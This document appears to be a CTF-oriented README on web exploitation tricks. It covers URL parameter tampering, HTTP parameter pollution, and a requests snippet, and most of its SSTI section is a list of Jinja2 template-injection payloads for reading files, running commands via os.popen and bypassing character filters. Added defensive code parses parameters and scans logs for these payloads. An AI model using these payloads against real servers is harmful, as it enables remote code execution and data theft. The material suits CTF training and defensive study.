Tricks in web exploiting

This repository aims to make building payloads for web exploitation simpler; most of the situations come from CTFs. If you are looking for some tricky methods, hope you enjoy!

Introduction

What is actually hacking?

Hacking is simple; you may have hacked something before. Go to Google and search for "lifehack": there are many videos about it. So how do we define hacking?

  • Understanding thoroughly how objects work, to use them in a creative, smart way to achieve any purpose (bad or good). - CyberJutsu team.
  • Hacking is solving problems in ways unimaginable for those confined to conventional thinking and methodologies. - Hacking: The Art of Exploitation (book).

Where should I start?

Following this meaning of hacking, you should first know what you want to hack. For example, if you want to hack a website, you must know how websites work: how packets are sent from client to server, the technology hosting the website (such as an Apache Tomcat server), the language the website is built in (PHP or JavaScript), what weird behaviours websites have, and so on.

But how do you choose a suitable field in cyber security to start with? The simple answer: try them all and see how they feel; you will learn a lot of new things. Moreover, you can join some live events that give you fundamental knowledge. Play some CTFs to learn which skills you need to improve for your career. Besides, finding a team with the same hobby is a good way to keep up your effort when you get stuck.

Understand the nature of the object, make a hypothesis, and try to find the most efficient way to hack it.

User Input

The basic way an application gets data: users type in their information, or what they want to find. In the cyber field, untrusted (external) data is the most notable thing, because it is hard to control or to know. Every request can carry malicious input, and that input can affect the whole system; hence "never trust user input". Wherever users can change, type, upload, etc., those are the entry points hackers can exploit.

Hacking mindset

How do you make hacking easier? You need to develop a hacking mindset, which is similar to critical thinking. You shouldn't ask "How do I hack this website?": that is a closed question and it is hard to find what you need. Instead, ask "What technology does this website use?", "Does this library have any vulnerabilities recorded in the past?", and so on. Practise more and it will help you get better day by day. The more ways there are to access something, the less secure it tends to be (convenience is inversely proportional to security); every language has its own specific vulnerabilities, including its libraries, from user input, frontend and backend to the database. Always ask how it can be exploited, and how many possible methods there are.

How to learn security: learn the prerequisite knowledge, know "how does it work?", know the details of the website, think creatively, and practise.

What is purpose of this repo?

This repo mainly shares tricks for solving popular vulnerabilities (almost all of them from CTFs). It may help you improve your knowledge about hacking. Moreover, it comes with some basic definitions. Some things in this repo may be wrong or out of date; feel free to open a pull request to make it better.

Understanding the mechanism will help you go far in the future.


URL

What is URL?

A uniform resource locator, or URL, is a short string containing an address that refers to an object on the "web". URLs are a subset of URIs. Moreover, a URL can be used for a GET request with modified parameters; see more here. In fact, some specific characters are encoded; you can find the rules for query strings here.

So let's get into the main part. Here is a sample query: https://example.com/?query=test&query2=test2, which sends the value test in the parameter query. So how can you exploit it? Just modify the parameters however you like to get information; what you get depends on the code.

<?php
    if($_GET['get']=="abc") echo ("Hacked");
    else echo("Wrong");
?>

Here is sample PHP code; its aim is to print Hacked when $_GET['get']=="abc" (the GET method is explained here), so the solution is https://example.com/?get=abc. Other parameters come with their own code:

Ex1:

<?php
    if($_GET['ip']==$_SERVER['REMOTE_ADDR']) echo ("Hacked");
    else echo("Wrong");
?>

Solution: https://example.com/?ip=<your-ipv4> (you can find your IP here).

Ex2:

#!/usr/bin/env python3

from flask import Flask, render_template_string, request, Response
app = Flask(__name__)

@app.route('/')
def index():
    # serve this file's own source so the player can read it
    return Response(open(__file__).read(), mimetype='text/plain')

@app.route('/ssti')
def ssti():
    query = request.args['query'] if 'query' in request.args else '...'

    if len(query) > 48:
        return "Too long!"
    # the user-controlled string is rendered as the template itself (SSTI)
    return render_template_string(query)

app.run('0.0.0.0', 1337)

It is a bit more complex: you must find the variable that can be exploited. query = request.args['query'], so query is the parameter; request.args['query'] uses the same GET method, but the request must go to the route of its function, so the solution is https://example.com/ssti?query=<your-payload>.

Some URL filters

In fact, you can see the URL change when you submit a form or something else.

For example: example.com/?id=123 queries the id of something; the code inside may look like:

SELECT Storage FROM User WHERE id = "123" - a simple SQL query (moreover, there are many injection types). It may lead to SQL Injection (which can leak user data from the database), but SQL Injection will be discussed in the next section. Some popular filtered characters are the quote, the space and --.

HTTP parameter pollution

The previous part showed how to send a value by changing a URL parameter, so what happens when you send the same parameter multiple times, like https://example.com/?color=red&color=blue? The result will be red, blue or both of them. It depends on the language used and the type of server. For example:

  • if your server uses JSP with Tomcat, the result is red - the first value;
  • PHP with Apache: the result is blue - the second one;
  • ASP with IIS: the result will be both of them.

Because the request becomes ambiguous, we can inject malicious input to: alter the behaviour of the website, exploit it, bypass a WAF, change an input value, etc. There are two variants: Server-Side and Client-Side.

Server-Side HPP

When you send a request to the server, the server not only returns the text of the website but may also return the result of some code. Here is an example: https://www.example.com/transfer?from=123&to=456&amount=5000 - the aim of this URL is to transfer money from alice to bob, so let's mess with the order of the parameters: https://www.example.com/transfer?from=123&to=456&amount=5000&from=789.

Here is the code inside the server:

        user.account = 123

        def prepare_transfer(params)
            params << user.account
            transfer_money(params) # user.account (123) is params[2]
        end

        def transfer_money(params)
            to = params[0]
            amount = params[1]
            from = params[2]
            transfer(to, amount, from)
        end

So how does it work? prepare_transfer gets one array called params containing the parameters to and amount from the URL, so the array is [456, 5000]. The value from the first line, user.account = 123, is pushed onto the end of the array, [456, 5000, 123], and then params is passed to transfer_money. The order of the array is to account -> amount -> from account. Let's change the order of the parameters, https://www.bank.com/transfer?to=456&amount=5000&from=789: the array is [456, 5000, 789, 123], and following the order of the array, the money of 789 will be sent to 456.

Client-Side HPP

Here is the URL: http://host/page.php?par=123%26action=edit and the code inside:

 <? $val=htmlspecialchars($_GET['par'],ENT_QUOTES); ?>
   <a href="/page.php?action=view&par='.<?=$val?>.'">View Me!</a>

The %26 is decoded to & before it reaches $_GET, and although htmlspecialchars() turns it into &amp;, the browser decodes &amp; back to & inside the href, so the link the user clicks is /page.php?action=view&par=123&action=edit and the injected action=edit may override the intended action=view (depending on which value the server keeps).
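The following Python is an added example (not code from this repo) that models the three duplicate-parameter behaviours listed under HTTP parameter pollution with urllib.parse, adds a check that flags duplicated parameter names, and shows hardened versions of the transfer case and of the View Me! link: the transfer fields are looked up by name with 'from' taken only from the session, and the link value is URL-encoded. The function names and sample query strings are my own.

```python
from urllib.parse import parse_qsl, quote


def resolve_param(query, name, policy):
    """Value a given stack sees for a duplicated parameter.

    policy: 'first' (JSP/Tomcat), 'last' (PHP/Apache) or 'all'
    (ASP/IIS keeps both values; modelled here as a comma-joined string).
    """
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]
    if not values:
        return None
    if policy == "first":
        return values[0]
    if policy == "last":
        return values[-1]
    if policy == "all":
        return ",".join(values)
    raise ValueError("unknown policy: " + policy)


def duplicated_params(query):
    """Defensive check: parameter names that were sent more than once."""
    counts = {}
    for k, _ in parse_qsl(query, keep_blank_values=True):
        counts[k] = counts.get(k, 0) + 1
    return sorted(k for k, n in counts.items() if n > 1)


def build_transfer(query, session_account):
    """Hardened prepare_transfer (hypothetical fix, not the repo's): fields are
    looked up by name, never by position, and 'from' comes only from the
    session, so an injected from=789 in the URL has no effect."""
    params = dict(parse_qsl(query, keep_blank_values=True))  # last value wins
    return {"to": params.get("to"), "amount": params.get("amount"),
            "from": session_account}


def build_view_link(par):
    """Client-side HPP fix: URL-encode the value so an embedded '&' stays
    part of 'par' instead of starting a second 'action' parameter."""
    return "/page.php?action=view&par=" + quote(par, safe="")


if __name__ == "__main__":
    print(resolve_param("color=red&color=blue", "color", "all"))  # red,blue
    print(duplicated_params("from=123&to=456&amount=5000&from=789"))  # ['from']
    print(build_view_link("123&action=edit"))
```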

Technique

Including some interesting methods that help to solve CTF challenges.


Snippets

Sample code for multiple purposes, to make web exploitation easier.

Request

You can send a payload to the server with Python and read the response. In this part, we will use the requests library for Python.

First, install it on your computer with the command pip install requests. Example:

    import requests
    # value1 and value2 must be strings (sample values here)
    value1, value2 = 'test', 'test2'
    param = {'1': value1, '2': value2}  # change '1' and '2' to the parameter names of the website
    x = requests.get('https://example.com', params=param)
    print(x.text)  # here is the response; text is the raw body as a string

The above uses the GET method; if you want to use POST, change it to requests.post. Moreover, there are other response attributes you can try:

  • status_code: shows the HTTP status code as a number (200-299 means success).
  • json(): decodes the JSON body of the response.

SSTI

What is ssti?

It stands for server-side template injection; it occurs when an attacker is able to use native template syntax to inject a malicious payload into a template. Find more here.


Jinja2

It is the template engine of the Flask framework (Python); you can find more here.

Some popular payloads:

  • Test whether SSTI is working: {{7*7}} or {{7*'7'}}
  • Read the server config: {{config.items()}} or {{config}} or {% print config %}
  • Open the file at path <path/of/file>:
    • {{ ''.__class__.__mro__[2].__subclasses__()[40]('<path/of/file>').read() }}
    • {{get_flashed_messages.__globals__.__builtins__.open("<path/of/file>").read()}}
    • {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("<path/of/file>").read() }}
  • Open the flag file (using the filter bypasses below):
    • {{lipsum.__globals__.__getitem__(dict(os=x)|first).popen((dict(cat=x)|first)+(dict(fl=x)|first|indent((dict(bla=x)|first)|length,true))+(dict(ag=x)|first)).read()}}
    • {{lipsum.__globals__[dict(__buil=anh,tins__=to)|join][dict(op=pro,en=wa)|join](dict(fl=a,ag=b)|join).read()}}
    • {{url_for.__globals__.os.popen((((dict(c=x,a=x,t=x)|list)|join)|center)+(dict(fl=x,ag=x)|list)|join).read()}}
    • {{get_flashed_messages.__globals__.__builtins__.open([].__doc__[-[[],[],[],[],[]].__len__()]+().__doc__[[[],[],[]].__len__()]+().__add__.__name__[[[],[]].__len__()]+().__gt__.__name__[[[],[]].__len__()]).read()}}
  • Execute <cmd>:
    • {{lipsum.__globals__.os.popen('<cmd>').read()}}
    • {{cycler.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{joiner.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{namespace.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{self._TemplateReference__context.joiner.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{self._TemplateReference__context.namespace.__init__.__globals__.os.popen('<cmd>').read()}}
  • Update the config:
    • {% set x=config.update(l=lipsum) %}

Some popular filters:

  • {{ }}: or some similar syntax (opening syntax); you can use other syntax such as {% %}

  • [a-Z]: some specific letters are blocked, like flag, cat, etc. You can build them with Python magic methods.

    • a: ().__add__.__name__[2] or ().__add__.__name__[-5]
    • d: ().__add__.__name__[-3]
    • f: [].__doc__[-5]
    • g: ().__gt__.__name__[2] or ().__gt__.__name__[-4]
    • l: ().__doc__[3] or ().__add__.__name__[3]
    • i: ().__doc__[2]
    • j: ().__doc__[5]
    • t: ().__gt__.__name__[3] or ().__gt__.__name__[-3]
    • u: ().__doc__[1]
    • os: dict(os=x)|first
  • [0-9]: decimal numbers are blocked; if you run into the filter above as well, feel free to combine them.

    • 0: [].__len__()
    • 1: [[]].__len__()
    • 2: [[],[]].__len__()
    • 3: [[],[],[]].__len__()
    • 4: [[],[],[],[]].__len__()
    • 5: [[],[],[],[],[]].__len__()
    • 6: [[],[],[],[],[],[]].__len__()
    • 7: [[],[],[],[],[],[],[]].__len__()
    • 8: [[],[],[],[],[],[],[],[]].__len__()
    • 9: [[],[],[],[],[],[],[],[],[]].__len__()
  • ': use dict() instead

  • (blank or space): use indent()

  • _: move the string over request.args: {% set x = config.update(g=request.args.a) %}, then send payload=<payload>&a=__globals__

  • Other filters: use the unicode encoder here

  • Others can be found here
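As an added defensive example (not part of this repo), here is a small log scanner that looks for the Jinja2 payload families listed above, the {{7*7}} test, __globals__/popen chains, dict(...)|join string building and the request.args trick, in constructed access-log lines for the Ex2 /ssti endpoint. The log lines, rule names and function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines for the Ex2 /ssti endpoint (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - "GET /ssti?query=hello HTTP/1.1" 200
10.0.0.6 - - "GET /ssti?query=%7B%7B7*7%7D%7D HTTP/1.1" 200
10.0.0.7 - - "GET /ssti?query=%7B%7Blipsum.__globals__.os.popen(%27%3Ccmd%3E%27).read()%7D%7D HTTP/1.1" 200
10.0.0.8 - - "GET /ssti?query=%7B%25+set+x%3Dconfig.update(g%3Drequest.args.a)+%25%7D&a=__globals__ HTTP/1.1" 200
10.0.0.9 - - "GET /ssti?query=%7B%7Blipsum.__globals__%5Bdict(__buil%3Da,tins__%3Db)%7Cjoin%5D%7D%7D HTTP/1.1" 200
"""

# Each rule maps to one of the payload families listed above.
RULES = {
    "jinja_delimiters": re.compile(r"\{\{|\{%|%\}|\}\}"),
    "dunder_attribute": re.compile(r"__[a-z]+__"),
    "dangerous_name": re.compile(
        r"\b(popen|__subclasses__|__mro__|__builtins__|__globals__|config\.update)\b"),
    "string_building": re.compile(r"dict\([^)]*\)\s*\|\s*(first|join|list)|\[\[\],\s*\[\]"),
    "attribute_via_args": re.compile(r"request\.args\.\w+"),
}


def extract_query(line):
    """Pull the raw query string out of a combined-log request line."""
    m = re.search(r'"[A-Z]+ [^ ?]*\?([^ "]*)', line)
    return m.group(1) if m else ""


def classify(query):
    """Decode once (as Flask's request.args does) and return the matching rule names."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(text):
    """Return (client_ip, [rule names]) for every line that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        hits = classify(extract_query(line))
        if hits:
            findings.append((line.split()[0], hits))
    return findings


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

The benign first line produces no finding; the probe line trips only the delimiter rule, while the gadget-chain lines trip several rules at once, which is the signal worth alerting on.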


Injection

SQL Injection

How SQL works

Reference source


tags: CTFs Web Exploit